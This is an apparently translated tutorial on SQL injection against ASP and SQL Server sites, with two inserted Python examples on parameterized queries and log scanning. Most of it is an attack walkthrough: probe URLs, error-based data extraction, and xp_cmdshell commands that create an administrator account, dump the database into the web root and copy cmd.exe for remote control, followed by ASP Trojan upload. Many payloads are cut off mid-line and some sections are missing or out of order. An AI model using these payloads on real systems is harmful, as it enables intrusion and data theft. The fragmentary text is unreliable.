SQL injection attacks
SQL injection is one of the common means by which attackers compromise databases. As B/S (browser/server) application development has spread, more and more programmers write applications in this model.
However, programmers' skill and experience vary, and a significant portion of them do not check the legitimacy of user input when writing code, which leaves the application with security risks. A user can submit database query code and, from the results the program returns, obtain data he wants to learn. This is called SQL Injection.
- 1 Introduction to injection
- 2 General idea
- 3 Responses
  ▪ SQL injection vulnerability judgment
  ▪ Analyzing the database server type
  ▪ Whether xp_cmdshell can be executed
  ▪ Finding the WEB virtual directory
  ▪ Uploading an ASP Trojan
  ▪ Obtaining system administrator privileges
  ▪ Several special means
- 5 Attack background
- 6 Common injection tools
  ▪ Ah D injection tool
  ▪ Ming Kid
- 7 Network analysis
- 8 How to prevent
SQL injection comes in through the normal WWW port, and on the surface it looks no different from ordinary web page access, so off-the-shelf firewalls raise no alert for it. If the administrator does not habitually review the IIS logs, an intrusion may go unnoticed for a long time. SQL injection is, however, quite flexible: many unexpected situations arise during injection, and the SQL statement has to be constructed carefully to obtain the desired data.
The general idea
· Find the SQL injection point;
· Determine the type of back-end database;
· Determine whether XP_CMDSHELL can be executed;
· Discover the WEB virtual directory;
· Upload an ASP Trojan;
· Obtain administrator rights;
From the security technology perspective, SQL injection attacks can be prevented with a database firewall. Because SQL injection attacks typically arrive through the application, virtual patching technology can be used to recognize SQL injection attack signatures and block attacks in real time.
Attack steps
SQL injection vulnerability judgment
In general, SQL injection appears in pages that take parameters, of the form HTTP://xxx.xxx.xxx/abc.asp?id=XX and so on.
An ASP dynamic page sometimes has only one parameter and sometimes N parameters; sometimes they are integer parameters, sometimes string parameters, so there is no general rule. In short, as long as a dynamic page accesses the database with a parameter, SQL injection is possible. If the ASP programmer has no security awareness and does not perform the necessary character filtering, the probability that SQL injection exists is very high.
To see the full information in the dynamic page's response, adjust IE's configuration: in the IE menu, Tools – Internet Options – Advanced, uncheck "Show friendly HTTP error messages".
To illustrate the problem clearly, the following analysis uses HTTP://xxx.xxx.xxx/abc.asp?p=YY as an example, where YY may be an integer or a string.
⒈ Analyzing an integer parameter
When the input parameter YY is an integer, the original SQL statement in abc.asp is usually:
select * from table where field = YY, so the following steps can be used to test whether SQL injection exists.
① HTTP://xxx.xxx.xxx/abc.asp?p=YY' (a single quotation mark is appended); the SQL statement in abc.asp becomes
select * from table where field = YY', and abc.asp runs abnormally;
② HTTP://xxx.xxx.xxx/abc.asp?p=YY and 1=1: abc.asp runs normally, with the same result as HTTP://xxx.xxx.xxx/abc.asp?p=YY;
③ HTTP://xxx.xxx.xxx/abc.asp?p=YY and 1=2: abc.asp runs abnormally;
⒉ Analyzing a string parameter
When the input parameter YY is a string, the original SQL statement in abc.asp is usually:
select * from table where field = 'YY', so the following steps can be used to test whether SQL injection exists.
① HTTP://xxx.xxx.xxx/abc.asp?p=YY' (a single quotation mark is appended); the SQL statement in abc.asp becomes
select * from table where field = 'YY'', and abc.asp runs abnormally;
② HTTP://xxx.xxx.xxx/abc.asp?p=YY …'1'='1': abc.asp runs normally, with the same result as HTTP://xxx.xxx.xxx/abc.asp?p=YY;
③ HTTP://xxx.xxx.xxx/abc.asp?p=YY …'1'='2': abc.asp runs abnormally;
If all three steps above are satisfied, an SQL injection vulnerability certainly exists in abc.asp.
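The three checks above can be reproduced offline to see why they behave as they do against concatenated SQL, and why input validation plus parameter binding makes them inert. This is an added example, not code from the original page; it assumes an in-memory SQLite database standing in for the SQL Server instance and a table named article in place of the page's "table" and "field".

```python
import sqlite3

# Constructed stand-in for the page's "select * from table where field = YY":
# an in-memory SQLite database replaces the SQL Server instance the page assumes.
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("create table article (id integer primary key, title text)")
    conn.executemany("insert into article values (?, ?)",
                     [(1, "first"), (2, "second"), (3, "third")])
    return conn

def vulnerable_lookup(conn, p):
    """The page's pattern: the request parameter is pasted into the SQL text."""
    return conn.execute("select * from article where id = " + p).fetchall()

def hardened_lookup(conn, p):
    """Reject anything that is not an integer, then bind it as a parameter."""
    try:
        value = int(p)
    except ValueError:
        raise ValueError("id must be an integer")
    return conn.execute("select * from article where id = ?", (value,)).fetchall()

# The three checks the page describes for an integer parameter.
PROBES = (("base", ""), ("quote", "'"), ("and_1_1", " and 1=1"), ("and_1_2", " and 1=2"))

def run_probes(lookup, conn, base="1"):
    """Return {probe name: rows, or "error" if the page raised an exception}."""
    results = {}
    for name, suffix in PROBES:
        try:
            results[name] = lookup(conn, base + suffix)
        except (sqlite3.Error, ValueError):
            results[name] = "error"
    return results

def looks_injectable(results):
    """The page's rule: quote -> error, 'and 1=1' -> unchanged, 'and 1=2' -> different."""
    return (results["quote"] == "error"
            and results["and_1_1"] == results["base"]
            and results["and_1_2"] not in ("error", results["base"]))

if __name__ == "__main__":
    db = make_db()
    print("concatenated:", looks_injectable(run_probes(vulnerable_lookup, db)))  # True
    print("parameterized:", looks_injectable(run_probes(hardened_lookup, db)))   # False
```

With the hardened version every probe is rejected before it reaches the database, so the three checks no longer distinguish "and 1=1" from "and 1=2".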
⒊ Handling special cases
Sometimes ASP programmers filter out characters such as single quotes to prevent SQL injection. In that case the following approaches can be tried.
① Mixed case: because VBS is not case sensitive, and programmers' filters usually match either an all-uppercase or an all-lowercase string, mixed-case strings are often overlooked, e.g. SelecT instead of select or SELECT;
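The page notes that an administrator who does not review the IIS logs may miss an intrusion, and that filters matching only one letter case are bypassed by mixed-case keywords. The following added example (not code from the original page) scans constructed IIS-style log lines for the probe patterns described above after URL-decoding and lower-casing the query string, so that SeLeCt or AnD spellings are caught; the log format and sample lines are assumptions made for this example.

```python
import re
from urllib.parse import unquote_plus

# Constructed IIS-style log lines (date time method uri-stem uri-query status);
# sample data written for this example, not taken from any real server.
SAMPLE_LOG = """\
2024-01-01 10:00:01 GET /abc.asp p=12 200
2024-01-01 10:00:02 GET /abc.asp p=12%27 500
2024-01-01 10:00:03 GET /abc.asp p=12+and+1%3D1 200
2024-01-01 10:00:04 GET /abc.asp p=12+AnD+1%3D2 500
2024-01-01 10:00:05 GET /abc.asp p=12;exec+master..xp_cmdshell+%22dir%22-- 500
2024-01-01 10:00:06 GET /abc.asp p=12+SeLeCt+name+from+master.dbo.sysdatabases 500
2024-01-01 10:00:07 GET /index.asp id=7 200
"""

# Patterns run against the decoded, lower-cased query, so case mixing such as
# SeLeCt does not slip past them as it does past a single-case string filter.
PROBE_PATTERNS = {
    "quote_probe": re.compile(r"'"),
    "boolean_probe": re.compile(r"\band\s+\d+\s*=\s*\d+"),
    "stacked_exec": re.compile(r";\s*exec\b"),
    "xp_cmdshell": re.compile(r"\bxp_cmdshell\b"),
    "system_tables": re.compile(r"\b(sysobjects|syscolumns|sysdatabases)\b"),
    "select_keyword": re.compile(r"\bselect\b"),
}

def normalize_query(raw_query):
    """Decode twice (to undo double encoding) and lower-case; '+' becomes space."""
    return unquote_plus(unquote_plus(raw_query)).lower()

def classify_line(line):
    """Return (uri_stem, decoded_query, [pattern names hit]) or None if malformed."""
    parts = line.split()
    if len(parts) < 6:
        return None
    stem, query = parts[3], parts[4]
    decoded = normalize_query(query)
    return stem, decoded, [n for n, rx in PROBE_PATTERNS.items() if rx.search(decoded)]

def find_probes(log_text):
    """Return [(line_no, uri_stem, hits)] for every line that matched a pattern."""
    findings = []
    for line_no, line in enumerate(log_text.splitlines(), 1):
        parsed = classify_line(line)
        if parsed and parsed[2]:
            findings.append((line_no, parsed[0], parsed[2]))
    return findings

if __name__ == "__main__":
    for line_no, stem, hits in find_probes(SAMPLE_LOG):
        print(f"line {line_no}: {stem} -> {', '.join(hits)}")
```

A single quote or a "select" in a query string is not proof of an attack, so treat these hits as review triggers and correlate them with the 500 status codes the abnormal responses produce.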
stored all the library names, as well.
Here I list the useful field names and their meaning for everyone. name // the name of the database.
dbid // the database ID; dbid 1 to 5 are the system databases, namely master, model, msdb, mssqlweb and tempdb. With select * from master.dbo.sysdatabases you can list all database names.
sysobjects: SQL Server has this system table in every database; it holds one row for each object created within the database, such as constraints, defaults, logs, rules and stored procedures.
syscolumns: one row for each column of every table and view, and one row for each parameter of every stored procedure; this table exists in every database. Its main fields are:
name, id, colid: the column name, the ID of the table it belongs to, and the column ID; the table ID is the one just obtained from the sysobjects table.
Usage: select * from ChouYFD.dbo.syscolumns where id = 123456789 lists all columns of the table whose ID is 123456789 in the ChouYFD database.
If the current database connection account has SA rights and the master.dbo.xp_cmdshell extended stored procedure (calling it runs the operating system shell) executes normally, the entire computer can be completely controlled in several ways, and all the later steps can be skipped.
⒈ HTTP://xxx.xxx.xxx/abc.asp?p=YY …er>0: abc.asp raises an exception, but the error reveals the user name of the current database connection (if it shows dbo, the connection has SA rights).
⒉ HTTP://xxx.xxx.xxx/abc.asp?p=YY …me()>0: abc.asp raises an exception, but the error reveals the name of the currently connected database.
⒊ HTTP://xxx.xxx.xxx/abc.asp?p=YY;exec master..xp_cmdshell "net user aaa bbb /add"-- (master is the primary SQL Server database; the semicolon tells SQL Server to execute the statement before it and then continue with the statement after it; "--" is a comment marker, meaning everything after it is only a comment and is not executed) directly adds an operating-system account aaa with password bbb.
⒋ HTTP://xxx.xxx.xxx/abc.asp?p=YY;exec master..xp_cmdshell "net localgroup administrators aaa /add"-- adds the account aaa just created to the administrators group.
⒌ HTTP://xxx.xxx.xxx/abc.asp?p=YY;backup database <database name> to disk='c:\inetpub\wwwroot\save.db' backs up all the obtained data into the WEB directory, after which the file is downloaded over HTTP (the WEB virtual directory must of course be known first).
⒍ Create a UNICODE vulnerability by copying CMD
HTTP://xxx.xxx.xxx/abc.asp?p=YY;exe…dbo.xp_cmdshell "copy c:\winnt\system32\cmd.exe c:\inetpub\scripts\cmd.exe" manufactures a UNICODE vulnerability; by exploiting it, control of the entire computer is achieved (the WEB virtual directory must of course be known first).
Finding the WEB virtual directory
The WEB virtual directory must be found in order to determine where to place the ASP Trojan and then obtain USER permissions. Two methods are particularly effective.
First, guess from experience: in general the WEB virtual directory is c:\inetpub\wwwroot, D:\inetpub\wwwroot, E:\inetpub\wwwroot and so on, and the executable virtual directory is c:\inetpub\scripts, D:\inetpub\scripts, E:\inetpub\scripts and so on.
Second, traverse the system's directory structure, analyze the results, and find the WEB virtual directory:
Create a temporary table temp:
HTTP://xxx.xxx.xxx/abc.asp?p=YY;create …mp(id nvarchar(255), num1 nvarchar(255), num2 nvarchar(255), num3 nvarchar(255));--
⑴ Use xp_availablemedia to get all current drives and store them in the temp table:
…TestDB.dbo.temp)>0 takes the value of the id field in the first record of the temp table and compares it with an integer; abc.asp obviously fails, but the value of the id field can be found in the exception message. Suppose we find that the table name is xyz; then
The so-called ASP Trojan is a piece of ASP code with special functions that is placed in the Scripts directory of the WEB virtual directory; a remote client can execute it with IE and then obtain USER permissions on the system, achieving initial control of it. There are generally two effective methods for uploading an ASP Trojan:
⒈ Use the WEB remote management function
Many WEB sites provide remote management functions for ease of maintenance, and many WEB sites also grant different access rights to different users for their content. To control user rights, a page requires a user name and password; entering the correct values allows the next step, WEB management operations such as uploading and downloading files, browsing directories, and modifying configuration.
Therefore, with the correct user name and password, not only can an ASP Trojan be uploaded, but sometimes USER privileges and the ability to browse the system are obtained directly, and the complex "discover the WEB virtual directory" step can be omitted.